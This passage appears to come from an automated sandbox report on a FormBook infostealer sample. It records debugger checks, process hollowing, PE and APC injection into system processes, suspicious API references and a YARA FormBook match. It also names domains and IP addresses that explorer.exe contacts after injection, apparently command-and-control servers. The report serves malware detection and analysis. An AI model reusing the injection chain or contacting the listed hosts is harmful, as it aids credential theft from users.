      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C9B260 mov eax, dword ptr fs:[00000030h]3_2_00C9B260
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB8A62 mov eax, dword ptr fs:[00000030h]3_2_00CB8A62
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE5210 mov eax, dword ptr fs:[00000030h]3_2_00BE5210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE5210 mov ecx, dword ptr fs:[00000030h]3_2_00BE5210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE5210 mov eax, dword ptr fs:[00000030h]3_2_00BE5210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE5210 mov eax, dword ptr fs:[00000030h]3_2_00BE5210
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF8A0A mov eax, dword ptr fs:[00000030h]3_2_00BF8A0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C2927A mov eax, dword ptr fs:[00000030h]3_2_00C2927A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C03A1C mov eax, dword ptr fs:[00000030h]3_2_00C03A1C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAAA16 mov eax, dword ptr fs:[00000030h]3_2_00CAAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAAA16 mov eax, dword ptr fs:[00000030h]3_2_00CAAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C24A2C mov eax, dword ptr fs:[00000030h]3_2_00C24A2C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C24A2C mov eax, dword ptr fs:[00000030h]3_2_00C24A2C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9240 mov eax, dword ptr fs:[00000030h]3_2_00BE9240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9240 mov eax, dword ptr fs:[00000030h]3_2_00BE9240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9240 mov eax, dword ptr fs:[00000030h]3_2_00BE9240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9240 mov eax, dword ptr fs:[00000030h]3_2_00BE9240
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C653CA mov eax, dword ptr fs:[00000030h]3_2_00C653CA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C653CA mov eax, dword ptr fs:[00000030h]3_2_00C653CA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C103E2 mov eax, dword ptr fs:[00000030h]3_2_00C103E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0DBE9 mov eax, dword ptr fs:[00000030h]3_2_00C0DBE9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF1B8F mov eax, dword ptr fs:[00000030h]3_2_00BF1B8F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF1B8F mov eax, dword ptr fs:[00000030h]3_2_00BF1B8F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA138A mov eax, dword ptr fs:[00000030h]3_2_00CA138A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C9D380 mov ecx, dword ptr fs:[00000030h]3_2_00C9D380
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1B390 mov eax, dword ptr fs:[00000030h]3_2_00C1B390
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12397 mov eax, dword ptr fs:[00000030h]3_2_00C12397
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14BAD mov eax, dword ptr fs:[00000030h]3_2_00C14BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14BAD mov eax, dword ptr fs:[00000030h]3_2_00C14BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14BAD mov eax, dword ptr fs:[00000030h]3_2_00C14BAD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB5BA5 mov eax, dword ptr fs:[00000030h]3_2_00CB5BA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB8B58 mov eax, dword ptr fs:[00000030h]3_2_00CB8B58
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C13B7A mov eax, dword ptr fs:[00000030h]3_2_00C13B7A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C13B7A mov eax, dword ptr fs:[00000030h]3_2_00C13B7A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA131B mov eax, dword ptr fs:[00000030h]3_2_00CA131B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEDB60 mov ecx, dword ptr fs:[00000030h]3_2_00BEDB60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEF358 mov eax, dword ptr fs:[00000030h]3_2_00BEF358
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEDB40 mov eax, dword ptr fs:[00000030h]3_2_00BEDB40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB8CD6 mov eax, dword ptr fs:[00000030h]3_2_00CB8CD6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF849B mov eax, dword ptr fs:[00000030h]3_2_00BF849B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA14FB mov eax, dword ptr fs:[00000030h]3_2_00CA14FB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66CF0 mov eax, dword ptr fs:[00000030h]3_2_00C66CF0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66CF0 mov eax, dword ptr fs:[00000030h]3_2_00C66CF0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66CF0 mov eax, dword ptr fs:[00000030h]3_2_00C66CF0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1A44B mov eax, dword ptr fs:[00000030h]3_2_00C1A44B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7C450 mov eax, dword ptr fs:[00000030h]3_2_00C7C450
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7C450 mov eax, dword ptr fs:[00000030h]3_2_00C7C450
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0746D mov eax, dword ptr fs:[00000030h]3_2_00C0746D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB740D mov eax, dword ptr fs:[00000030h]3_2_00CB740D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB740D mov eax, dword ptr fs:[00000030h]3_2_00CB740D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB740D mov eax, dword ptr fs:[00000030h]3_2_00CB740D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA1C06 mov eax, dword ptr fs:[00000030h]3_2_00CA1C06
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66C0A mov eax, dword ptr fs:[00000030h]3_2_00C66C0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66C0A mov eax, dword ptr fs:[00000030h]3_2_00C66C0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66C0A mov eax, dword ptr fs:[00000030h]3_2_00C66C0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66C0A mov eax, dword ptr fs:[00000030h]3_2_00C66C0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1BC2C mov eax, dword ptr fs:[00000030h]3_2_00C1BC2C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov eax, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov eax, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov eax, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov ecx, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov eax, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C66DC9 mov eax, dword ptr fs:[00000030h]3_2_00C66DC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]3_2_00CAFDE2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]3_2_00CAFDE2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]3_2_00CAFDE2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]3_2_00CAFDE2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE2D8A mov eax, dword ptr fs:[00000030h]3_2_00BE2D8A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE2D8A mov eax, dword ptr fs:[00000030h]3_2_00BE2D8A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE2D8A mov eax, dword ptr fs:[00000030h]3_2_00BE2D8A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE2D8A mov eax, dword ptr fs:[00000030h]3_2_00BE2D8A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE2D8A mov eax, dword ptr fs:[00000030h]3_2_00BE2D8A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C98DF1 mov eax, dword ptr fs:[00000030h]3_2_00C98DF1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12581 mov eax, dword ptr fs:[00000030h]3_2_00C12581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12581 mov eax, dword ptr fs:[00000030h]3_2_00C12581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12581 mov eax, dword ptr fs:[00000030h]3_2_00C12581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12581 mov eax, dword ptr fs:[00000030h]3_2_00C12581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1FD9B mov eax, dword ptr fs:[00000030h]3_2_00C1FD9B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1FD9B mov eax, dword ptr fs:[00000030h]3_2_00C1FD9B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]3_2_00BFD5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]3_2_00BFD5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C135A1 mov eax, dword ptr fs:[00000030h]3_2_00C135A1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB05AC mov eax, dword ptr fs:[00000030h]3_2_00CB05AC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB05AC mov eax, dword ptr fs:[00000030h]3_2_00CB05AC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C11DB5 mov eax, dword ptr fs:[00000030h]3_2_00C11DB5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C11DB5 mov eax, dword ptr fs:[00000030h]3_2_00C11DB5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C11DB5 mov eax, dword ptr fs:[00000030h]3_2_00C11DB5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C23D43 mov eax, dword ptr fs:[00000030h]3_2_00C23D43
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C63540 mov eax, dword ptr fs:[00000030h]3_2_00C63540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF3D34 mov eax, dword ptr fs:[00000030h]3_2_00BF3D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEAD30 mov eax, dword ptr fs:[00000030h]3_2_00BEAD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C07D50 mov eax, dword ptr fs:[00000030h]3_2_00C07D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0C577 mov eax, dword ptr fs:[00000030h]3_2_00C0C577
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0C577 mov eax, dword ptr fs:[00000030h]3_2_00C0C577
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C6A537 mov eax, dword ptr fs:[00000030h]3_2_00C6A537
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAE539 mov eax, dword ptr fs:[00000030h]3_2_00CAE539
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14D3B mov eax, dword ptr fs:[00000030h]3_2_00C14D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14D3B mov eax, dword ptr fs:[00000030h]3_2_00C14D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C14D3B mov eax, dword ptr fs:[00000030h]3_2_00C14D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB8D34 mov eax, dword ptr fs:[00000030h]3_2_00CB8D34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C28EC7 mov eax, dword ptr fs:[00000030h]3_2_00C28EC7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C9FEC0 mov eax, dword ptr fs:[00000030h]3_2_00C9FEC0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C136CC mov eax, dword ptr fs:[00000030h]3_2_00C136CC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB8ED6 mov eax, dword ptr fs:[00000030h]3_2_00CB8ED6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C116E0 mov ecx, dword ptr fs:[00000030h]3_2_00C116E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7FE87 mov eax, dword ptr fs:[00000030h]3_2_00C7FE87
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF76E2 mov eax, dword ptr fs:[00000030h]3_2_00BF76E2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C646A7 mov eax, dword ptr fs:[00000030h]3_2_00C646A7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]3_2_00CB0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]3_2_00CB0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]3_2_00CB0EA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAAE44 mov eax, dword ptr fs:[00000030h]3_2_00CAAE44
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAAE44 mov eax, dword ptr fs:[00000030h]3_2_00CAAE44
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEE620 mov eax, dword ptr fs:[00000030h]3_2_00BEE620
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0AE73 mov eax, dword ptr fs:[00000030h]3_2_00C0AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0AE73 mov eax, dword ptr fs:[00000030h]3_2_00C0AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0AE73 mov eax, dword ptr fs:[00000030h]3_2_00C0AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0AE73 mov eax, dword ptr fs:[00000030h]3_2_00C0AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0AE73 mov eax, dword ptr fs:[00000030h]3_2_00C0AE73
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEC600 mov eax, dword ptr fs:[00000030h]3_2_00BEC600
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_011D9910
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.bloopacts.live
      Source: C:\Windows\explorer.exeNetwork Connect: 167.235.29.175 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.luregirl.net
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.167 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.augusta.broker
      Source: C:\Windows\explorer.exeNetwork Connect: 69.57.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 52.60.87.163 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.negerbajs.info
      Source: C:\Windows\explorer.exeNetwork Connect: 167.179.103.237 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.skyepattest.com
      Sample uses process hollowing technique
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 1040000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 832008Jump to behavior
      .NET source code references suspicious native API functions
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, c77928205c79153947a3867eb1d3ae9f1.csReference to suspicious API methods: ('ca32f43df15d0fcf475bd3334736bf498', 'OpenProcess@kernel32.dll'), ('ca37efa44dabb10805898a4954d1119a5', 'GetProcAddress@kernel32.dll'), ('c54b1fce306826501065cc03f5996d99c', 'GetProcAddress@kernel32.dll'), ('c46c0570566f16f7516dfae648f7934b4', 'GetProcAddress@kernel32.dll'), ('cf34e7e30997744b583b2bbfb33447166', 'GetProcAddress@kernel32.dll'), ('c8f0b49ae1e6a0350b8b1e4b3d7524958', 'LoadLibrary@kernel32.dll'), ('c5799ec05159ec4bc9e8dc79362b5dc32', 'GetProcAddress@kernel32.dll'), ('c93aeef4747029cbfcb3231026826322e', 'GetProcAddress@kernel32.dll')
      Source: 0.0.SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe.150000.0.unpack, c77928205c79153947a3867eb1d3ae9f1.csReference to suspicious API methods: ('ca32f43df15d0fcf475bd3334736bf498', 'OpenProcess@kernel32.dll'), ('ca37efa44dabb10805898a4954d1119a5', 'GetProcAddress@kernel32.dll'), ('c54b1fce306826501065cc03f5996d99c', 'GetProcAddress@kernel32.dll'), ('c46c0570566f16f7516dfae648f7934b4', 'GetProcAddress@kernel32.dll'), ('cf34e7e30997744b583b2bbfb33447166', 'GetProcAddress@kernel32.dll'), ('c8f0b49ae1e6a0350b8b1e4b3d7524958', 'LoadLibrary@kernel32.dll'), ('c5799ec05159ec4bc9e8dc79362b5dc32', 'GetProcAddress@kernel32.dll'), ('c93aeef4747029cbfcb3231026826322e', 'GetProcAddress@kernel32.dll')
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3528Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3528Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
      Source: explorer.exe, 00000002.00000000.350856603.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.371006560.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.318151089.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.329006218.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.388294175.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.350856603.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.371006560.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.370658770.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.350428124.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.317683736.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
      Source: explorer.exe, 00000002.00000000.350856603.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.371006560.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.318151089.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
